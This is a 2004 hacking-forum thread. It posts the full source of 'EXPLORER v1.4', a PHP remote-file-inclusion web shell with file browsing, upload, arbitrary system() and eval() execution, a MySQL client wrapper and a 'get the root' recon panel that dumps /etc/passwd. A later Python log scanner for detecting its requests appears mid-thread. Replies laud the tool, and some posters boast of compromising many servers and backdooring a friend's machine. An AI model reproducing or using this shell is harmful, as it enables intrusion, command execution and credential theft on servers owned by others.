GaLiaRePt
PHP include vulnerability exploit (EXPLORER v1.4)
Date: 2004-02-01

Author : Nourredine Himeur <lostnoobs@security-challenge.com>
Download : http://www.security-corporation.com/downlo...xplorerv1_4.txt

CODE
<?


$site="http://membres.lycos.fr/newbie2323/explorerv1_5.txt"; // Where this exploit is located. e.g.: www.dumbman.com/lolage/file.txt but it can be called by an unexplicit file url or file extension. Modify it as necessary

if(!$variable){
$variable="page"; // Inclusion variable from the vulnerable site. E.g. : http://vulnerable_site/wall.php?page=index.htm, here the page is the variable used for inclusion. Modify it as necessary.
}

/* EXPLORER v1.4 - Modified - GET THE ROOT ! THIS IS A PRIVATE VERSION

------------------------

PHP include vulnerability exploit for exploring purposes... Hum, no, sorry. For TESTING purposes ONLY.

Version : 1.4 - Modified version
Original version by : LostNoobs, www.security-challenge.com
Modified by : Clad Strife

France

------------------------


This exploit allows you to :

- Browse the server Hard Disk
- Upload files on the server
- Execute Unix or DOS commands
- Execute PHP


What is new with this modified version :

- Scan for non-protected files or directories on which you could write. Only for UNIX type servers.
- MySQL communication interface.
- Usual UNIX system commands interface to make easier a system overview
- Exploit rewritten in english
- Exploit has a better look and feel


To come :

- Backdoor creation on the server
- Scan of vulnerable files with include vulnerability


------ README :

E.g. :

http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt


More :

http://www.vulnerable_site.com is the vulnerable site

http://www.site_faillible.com/include.php?page=variable is the webpage from where the include function is. If include.php contains a include($page.".txt"); that means it includes only files finishing by the .txt extension, so you have to rename your file consequently.

http://www.mysite.com this is your site

http://www.mysite.com/explorer.txt (or any other extension) The address where this exploit is located.

You have to modify the script to make it work properly.

Now your script should be ready for action. Try it by using : http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt

*/

$view_readme = 1; // Set to 1 if you checked the readme.
if($view_readme == 0)
{
printf("<b>You should look at the README written inside this exploit if you want to unlock it !</b>");
exit;
}


# Here the exploit code begins !


echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=upload&variable='.$variable.'" > Upload a file.</a><br><br> ');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=explfopen&variable='.$variable.'" > Explore with fopen() function.</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execphp&variable='.$variable.'" > Execute arbitrary PHP functions.</a><br><br>');

if(system("echo '<font color=red >PHP system() function is working properly. The following features should work :</font>'"))
{
echo(' <br><br><a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=system&variable='.$variable.'" > Execute a system() command.</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execsql&variable='.$variable.'">
Manager for SQL Server</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'">System overviewer (get the root !)</a><br><br>');
}

echo('<font size=-2>Include Exploit v1.4 - modified<br>Original authors : LostNoobs.<br>Modified by : Clad Strife.</font>');



###
#
# (New feature) SQL Manager
#
###

if($option=="execsql")
{

// A little about this feature.

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execsql&variable=".$variable."\" METHOD=POST><hr><br><br>

From here you can try to manage a local or remote mysqld server. If you have some logins and pass to try on the SQL Server, then you can start from here.<bR><br>

In fact you could also use system() to exec the local mysql client, but the command line is getting too large and not easily rewritable by this way. This is why I made this query manager.<br><br>

<b>You need to have valid username/password to get into a local or remote database. To remote one you could be filtered, so don't get nervous about connection errors. Notice that this feature doesn't use the common mysql PHP functions, because the vulnerable page on which you make this exploit be browsable could crate some problems. It uses the common mysql client on *nix systems. The delay execution time of the client should be short enough to don't be discovered.</b>
");

// Here starts the manager :

echo("
<br><br><hr><br><br>

Enter the name of the mysql client binary (default : mysql):<br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">

<br><br>Enter the login (default : root, but you can change it):<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">

<br><br>Enter the password (\"none\" is only if no password is needed): <br>
<input name=\"sql_password\" type=\"text\" value=\"none\">

<br><br>Enter address of target. \"localhost\" is maybe what you are searching for. Check for 127.0.0.1 if it doesn't work. Enter a valid IP address or hostname for remote connection :<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">

<bR><br>Enter any other facultative options for mysql client. This feature is only designed to set more sql client options. E.g. : if you want to connect on a specific port you will have to write : \"--port=3306\". If you are unusure of what to do, leave it blank :<br>
<input name=\"sql_options\" type=\"text\" value=\"\">


<br><br>Enter valid SQL queries. You can try \"SHOW DATABASES;\" first (default) and then exec command as \"USE BASE1; SHOW TABLES;\". You can edit on multiple lines :<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>

<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>

");
}

if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // End of else if for no password option

else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // end of else

} // end of if


###
#
# (New feature) System overview utility
#
###

if($option=="overview")
{


echo('<br><br><hr><br>From here you will be able to execute many predefined commands which gather informations about the system itself. This has been designed to make an easier way to catch the root account. <b>GET THE ROOT ! Wh00h00 !!</b><br><br>More you choose commands to be executed, more you have to expect a long loading time. Do not be worry if the webpage is still hanging. Anyway some specific UNIX commands may not work properly, because the command options in this file are designed for GNU/LINUX systems.<br><br><hr><br><br>');

echo('

<FORM ENCTYPE="multipart/form-data" ACTION="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'" METHOD=POST>
<i>About processes :</i><br>
<INPUT TYPE="checkbox" name="procroot" VALUE="y"> What the are the processes executed by the root ?<br>
<INPUT TYPE="checkbox" name="procall" VALUE="y"> What are all running processes ?<br><br><br>

<i>About the system :</i><br>
<INPUT TYPE="checkbox" name="uname" VALUE="y"> Print certain system information.<br>
<INPUT TYPE="checkbox" name="catversion" VALUE="y"> What is the kernel version ?<br>

<INPUT TYPE="checkbox" name="mount" VALUE="y"> Where are the mounted filesystems ?<br>
<INPUT TYPE="checkbox" name="id" VALUE="y"> Which user is running this httpd server ?<br>
<INPUT TYPE="checkbox" name="who" VALUE="y"> Who is currently connected to the system ?<br>
<INPUT TYPE="checkbox" name="last" VALUE="y"> Give me the logins and hostnames of all last connected users.<br>
<INPUT TYPE="checkbox" name="modules" VALUE="y"> What are the running modules ?<br>
<INPUT TYPE="checkbox" name="hardware" VALUE="y"> Collect about Hardware (is it really useful ?)<br>
<INPUT TYPE="checkbox" name="network" VALUE="y"> Extract the network configuration<br>

<br><i>Collect data in files :</i><br>

<INPUT TYPE="radio" name="passwd" value="yfull"> Get all the /etc/passwd.<br>
<INPUT TYPE="radio" name="passwd" value="yshell"> Grab only users with a shell access.<br>
<INPUT TYPE="checkbox" name="group" value="y"> What are the available groups ?<br>
<INPUT TYPE="checkbox" name="resolv" value="y"> What are the DNS used by this server ?<br><br>

<i>Miscellaneous :</i><br>
<INPUT TYPE="radio" name="bcheck" value="big"> BIG CHECK<br>
It checks for non write-protected files. This feature may slow the page loading, and sometimes so much that it is not possible to continue. Try for the small check first before trying this one.<br>
<INPUT TYPE="radio" name="bcheck" value="small"> SMALL CHECK<br>
It checks for non-write protected files in /tmp and /home only. May not be exhaustive.<br>

<INPUT TYPE="checkbox" name="dirs" value="y"> + DIRECTORIES<br>
This checks for non-protected directories. This feature will only be used with a SMALL or BIG CHECK. Anyway it increases the global search time.<br><br>
<INPUT TYPE="submit" name="Submit" Value="Nuke !"></form><br><br><hr>');

if($Submit)
{
echo ('<br><TEXTAREA COLS=110 ROWS=40>Text output for all selected options. First you got the command processed, and next you read its output.
----------------------------------------------------------------------------->

');

// Here will start the output for each selected command.

///////////////////
if($procroot)
{
echo('

Processes launched by the root :
ps aux | grep root
--------------------------------

');
system("ps aux | grep root",$var);
if($var != 0){
echo("failed");}

}
//////////////////

//////////////////
if($procall)
{
echo('

Processes currently running :
ps aux
-----------------------------

');
system("ps aux",$var);
if($var != 0){
echo("failed");}
//////////////////
}

//////////////////
if($uname)
{
echo('

Certain system information :
uname -a
----------------------------

');
system("uname -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($catversion)
{
echo('

Kernel version :
cat /proc/version
-----------------

');
system("cat /proc/version",$var);
if($var != 0){
echo("failed");}
}
/////////////////

/////////////////
if($mount)
{
echo('

Show the mounted partitions :
mount
-----------------------------

');
system("mount",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($id)
{
echo('

Which user is running this server :
id
-----------------------------------

');
system("id",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($who)
{
echo('

Who is connected :
who
------------------

');
system("who",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($last)
{
echo('

Who are the last connected users :
last -a
----------------------------------

');
system("last -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($modules)
{
echo('

Running modules :
cat /proc/modules
-----------------

');
system("cat /proc/modules",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($hardware)
{
echo('

About Hardware :
cat /proc/cpuinfo
-----------------

');
system("cat /proc/cpuinfo",$var);
if($var != 0){
echo("failed");}

echo('

About Hardware :
cat /proc/pci
----------------

');
system("cat /proc/pci",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($network)
{
echo('

Network configuration :
ifconfig -a
-----------------------

');
system("ifconfig -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yfull")
{
echo('

Whole /etc/passwd :
cat /etc/passwd
-------------------

');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yshell")
{
echo('

Current account with a shell :
cat /etc/passwd | grep /bin/sh;
cat /etc/passwd | grep /bin/bash;
cat /etc/passwd | grep /bin/tcsh;
----------------------------------

');
system("cat /etc/passwd | grep /bin/sh; cat /etc/passwd | grep /bin/bash; cat /etc/passwd | grep /bin/tcsh;true",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yfull")
{
echo('

Full /etc/passwd :
cat /etc/passwd
-----------------

');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($group)
{
echo('

Current groups :
cat /etc/group
-----------------

');
system("cat /etc/group",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($resolv)
{
echo('

DNS used for resolution :
cat /etc/resolv.conf
-------------------------

');
system("cat /etc/resolv.conf",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($bcheck == "big")
{
echo('

Non-protected files on the whole system :
find / -type f -perm 777
-----------------------------------------

');
system("find / -type f -perm 777",$var);
if($var != 0){
echo("failed");}

if($dirs) //may also check for non protected directories
{
echo('

Non-protected directories on the whole system :
find / -type d -perm 777
-----------------------------------------------

');
system("find / -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////

/////////////////
if($bcheck == "small")
{

echo('

Non-protected files on /tmp and /home :
find /home -type f -perm 777;
find /tmp -type f -perm 777
---------------------------------------

');
system("find /home -type f -perm 777; find /tmp -type f -perm 777",$var);
if($var != 0){
echo("failed");}

if($dirs) //may also check for non protected directories
{
echo('

Non-protected directories on /home and /tmp :
find /home -type d -perm 777;
find /home -type d -perm 777
---------------------------------------------

');
system("find /home -type d -perm 777; find /tmp -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}

}
//////////////////


echo('


End of report.
</TEXTAREA><br>');
} // end of if($Submit)
} // end of if option = overview



###
#
# PHP Execution part ------------------------
#
###


if($option=="execphp"){

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execphp&variable=".$variable."\" METHOD=POST><hr><br><br>

Edit PHP code to execute. (e.g.: phpinfo(); echo(\"toto\"); ):<br>
<TEXTAREA input name=\"cmd0\" ROWS=15 COLS=50></TEXTAREA>
<br><br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">

</font>

</form>

");


if($cmd0){
$cmd0=str_replace("\\\"","\"",$cmd0);
$cmd0=str_replace("\\'","'",$cmd0);
echo("<br><br><hr><br><br>\"$cmd0\" results :<br><br>");
eval($cmd0);
echo("<br><br><hr><br><br>");
}
}

###
#
# System command part -----------------
#
###

if($option=="system"){

echo("


<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=system&variable=".$variable."\" METHOD=POST><hr><br><bR>

Choose a system command to execute with system() function :
<br>
<input name=\"cmd\" type=\"text\" value=\"\" size=40>
<br>
<br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>

</form>

");


if($cmd){
$cmd=str_replace("\\\"","\"",$cmd);
$cmd=str_replace("\\'","'",$cmd);
echo("<br><br><hr><br><br>Results for command <b>$cmd</b> :<br><br>");
echo "<form><textarea cols=100 rows=40>\"$cmd\" results :
-----------------------------------------

";

system($cmd,$var); // Output command in the textarea
if($var != 0){
system($cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one


echo "</textarea></form>";
}
echo("<br><br><hr><br><br><br>");
}


###
#
# Upload part ------------------
#
###

if($option=="upload"){

echo("


<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=upload&variable=".$variable."\" METHOD=POST><hr><br><br>

Choose the file on your computer that you want to upload :<br>
<input name=\"FileName\" type=\"FILE\" value=\"\" size=70>
<br><br>
Choose the remote location where you want the file to be stored. Provide a path ending with the file name (e.g. : /tmp/.myfile) :<br>
<input name=\"path\" type=\"text\" value=\"\" size=70>
<br>
<br>
<input type=\"SUBMIT\" value=\"Upload it !\" name=\"SUBMIT\">

</font>

</form>

");


if($FileName){

if ( !copy($FileName, $path)){

print("<br><br><hr><br><br>The upload of $FileName in $path failed...<br>\n");

}else{

echo("<br><br><hr><br><br>Upload Successfull !");

}
}
}


###
#
# Explorer part --------------------
#
###

if($option=="explfopen"){

function output( $mode )
{

if( $mode & 0x1000 )
$type='p'; /* FIFO pipe */
else if( $mode & 0x2000 )
$type='c'; /* Character special */
else if( $mode & 0x4000 )
$type='d'; /* Directory */
else if( $mode & 0x6000 )
$type='b'; /* Block special */
else if( $mode & 0x8000 )
$type='-'; /* Regular */
else if( $mode & 0xA000 )
$type='l'; /* Symbolic Link */
else if( $mode & 0xC000 )
$type='s'; /* Socket */
else
$type='u'; /* UNKNOWN */

/* Determine permissions */
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';

/* Adjust for SUID, SGID and sticky bit */
if( $mode & 0x800 )
$owner["execute"] = ($owner[execute]=='x') ? 's' : 'S';
if( $mode & 0x400 )
$group["execute"] = ($group[execute]=='x') ? 's' : 'S';
if( $mode & 0x200 )
$world["execute"] = ($world[execute]=='x') ? 't' : 'T';

printf("%1s", $type);
printf("%1s%1s%1s", $owner[read], $owner[write], $owner[execute]);
printf("%1s%1s%1s", $group[read], $group[write], $group[execute]);
printf("%1s%1s%1s\n", $world[read], $world[write], $world[execute]);

}


if($fichier)

{

echo "<form><textarea cols=100 rows=40>";
$fp = fopen ($rep."/".$fichier, "r");
$i=1;
while (!feof($fp))

{

$buffer=fgets($fp,4096);
$buffer=str_replace(chr(10),"",$buffer);
$buffer=str_replace(chr(13),"",$buffer);
echo $buffer."\n";

}

fclose ($fp);
echo "</textarea></form>";

}

else {

if(!$rep)

$rep="./"; // initial path location

echo("<br><br><hr><br><br>");

if($rep == "./../../../../../../../../../../../../")
{
echo("<b>You are in the root FileSystem.</b><br><br>");
}

$directory = opendir($rep);

while ($entree = readdir($directory)) {

if ($entree != "." && $entree != "..")

$tFichiers[] = filemtime($rep.$entree)."€".$entree."€".is_file($rep.$entree)."€".fileowner($rep.$entree);

}

closedir($directory);

rsort($tFichiers);

for ($cpt = 0; $cpt < sizeof($tFichiers); $cpt++) {

$tVals = explode("€", $tFichiers[$cpt]);

if($tVals[2]==0)

{

$link=$rep.$tVals[1]."/";

echo "[".date("Y-m-d H:i",$tVals[0])."] <B><a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a></B><BR>\n";

}

else{

$link=$rep."&fichier=".$tVals[1];

output(fileperms($rep.$entree));

echo "[".date("Y-m-d H:i",$tVals[0])."] <B><a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a></B> $tVals[3]<BR>\n"; }

}
}
}

?>
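
For defenders, the requests this script generates stand out in web server access logs: the inclusion parameter carries a remote URL, and every link and form action re-sends `option=` and `variable=`. The following is an added example, not part of the original post or the exploit; the combined log format, the sample lines and the function names `classify` and `scan` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# "option" values the script above dispatches on.
SHELL_OPTIONS = {"upload", "explfopen", "execphp", "system", "execsql", "overview"}
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Apache/nginx combined log format, parsed up to the status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target):
    """Classify one request target.

    Returns (verdict, param): verdict is "shell", "remote-include" or None;
    param is the query parameter that carried the remote URL.
    """
    query = target.partition("?")[2]
    params = parse_qsl(query, keep_blank_values=True)  # percent-decodes once
    remote = [name for name, value in params if REMOTE_SCHEME.match(value)]
    if not remote:
        return None, None
    fields = dict(params)
    # The script re-sends its routing fields on every link and form action:
    # option=<feature> and variable=<name of the inclusion parameter>.
    if fields.get("option") in SHELL_OPTIONS or fields.get("variable") in remote:
        return "shell", remote[0]
    # A URL-valued parameter alone is weaker evidence: redirect or callback
    # parameters look the same, so this is a lead to triage, not a confirmed hit.
    return "remote-include", remote[0]


def scan(lines):
    """Return one finding (dict) per suspicious access-log line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.match(line)
        if not match:
            continue
        verdict, param = classify(match["target"])
        if verdict:
            findings.append({
                "line": number,
                "ip": match["ip"],
                "method": match["method"],
                "status": int(match["status"]),
                "verdict": verdict,
                "param": param,
            })
    return findings


# Constructed sample lines: documentation IP ranges, host names from the README.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2004:10:00:01 +0000] "GET /wall.php?page=index.htm HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2004:10:02:13 +0000] "GET /wall.php?page=http://www.mysite.com/explorer.txt HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Feb/2004:10:02:40 +0000] "POST /wall.php?page=http://www.mysite.com/explorer.txt&option=system&variable=page HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Feb/2004:10:03:02 +0000] "GET /wall.php?page=http%3A%2F%2Fwww.mysite.com%2Fexplorer.txt&option=explfopen&variable=page HTTP/1.1" 200 3000',
    '192.0.2.44 - - [01/Feb/2004:10:05:00 +0000] "GET /search.php?q=option+system HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The POSTed fields (`cmd`, `cmd0`, `sql_query`) never reach an access log, but the form actions keep the routing fields in the query string, so those requests are still matched.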


ni3_boom
nice job man
but i got error while CPl
can any body help me ?
x1`
how do we use this then, cause it's not for windows so it doesn't compile
any instructions
phaeton
Sigh guys cmon, what are you doing on a board like this if you can't tell languages apart? That's a PHP script... try to read up on the matter before you ask questions. (and yes, it's for linux)
brOmstar
lol how to compile u r so funny =)

this is only a php-script which u can use to explore a system where it is possible to include remote php-files...

ps:
what can u do with that i'm a windows dummie ..more or less =(
is it possible to start a service at such a server by uploading a compiler + sourcecode and then run this ?
nulladd
how to compile
whahahahhhahhaahahaha

sorry, i'll stop now
yuliang11
get error while compiling?? u guys know what's a script? go and do some homework.. kiddies
Brt
thanks for your work
I also want to test it sometime
Alien
hehehe compile ??

no comments

LOL
phaeton
If you want to adapt it to windows it would not take much, just replace some of the built in commands and their paths etc etc for windows commands, as far as I see this isn't platform dependent, and the exploit is actually quite simple.
extreme
Oh, this stuff is so great.. I got so many servers with this one so far..
Serhat
I just tried it out, I can execute all the commands only @ the account of mine etc
Still a nice one
vnet576
QUOTE (yuliang11 @ Feb 2 2004, 12:28 AM)
get error while compiling?? u guys know what's a script? go and do some homework.. kiddies

Rofl...I can only imagine them plugging this script into Visual C++ or dev-cpp and wondering why it won't compile.
mrBob
lol
i know we've all been (or are) noobs... but soooooooo noob? nah
how to compile a php script... pff

well, i just had to reply on this
Kynroxes
Yes I read it yesterday, it's a great text.
Yorn
I wonder why they call them script kiddies when they only use .c code and compile it anymore. They can't even get PERL and PHP to work right so you can't exactly call them script kiddies. Hell, the guys like myself that know both are script GODS compared to these guys.
Trojan^kid
thanx GaLiaRePt 4 the exploit
and i have compiled the exploit
cheers
yuliang11
compiled it nicely? well be careful with the terms used. there are differences between compiler, interpreter and assembler.
nihoho
QUOTE (yuliang11 @ Feb 3 2004, 09:12 AM)
compiled it nicely? well be careful with the terms used. there are differences between compiler, interpreter and assembler.

Heh.. well, semantically speaking, one CAN compile a PHP exploit.. A piece of code from here, a piece of code from there and you can compile (verb: Put together out of existing material. Reference: WordWeb) an exploit, even in PHP.. Just a hunch but I think this method is used more often than not..

Anyway this is my first post here, and I'd like to start by thanking whoever maintains this forum for keeping it open and straightforward.. Lots of good info here.. Big thanks to the contributors also..

Regarding this exploit, can anyone please share a link to the original advisory?

Thanks.
ArchAngel
it's funny that people can't understand the simple sign that it's a php script

QUOTE
<?
at the top line should give it away
migo
guys what is wall.php
could anyone plz tell me how to include this script on any linux server
i just anyone give a working example of the first line of code that should be changed

flashb4ck
this script rulez :=)
a friend says that i never can hack his freebsd but he uses apache / php and so on perhaps i can now inject him with my backdoors LÖÖÖÖL



gr€€tZ fl4Shb4Ck
migo
QUOTE
this script rulez :=)
a friend says that i never can hack his freebsd but he uses apache / php and so on perhaps i can now inject him with my backdoors LÖÖÖÖL


could you plz give little explanation on how you configured this script to run ?

Best Regards
migo
migo
let me refine what i say
i wanna just know how can i include this script from the remote server?
i modify all the settings in the php file itself
now how can i include this file ?
from where to call it i mean from the remote server?
mysoulmustfly
thx a lot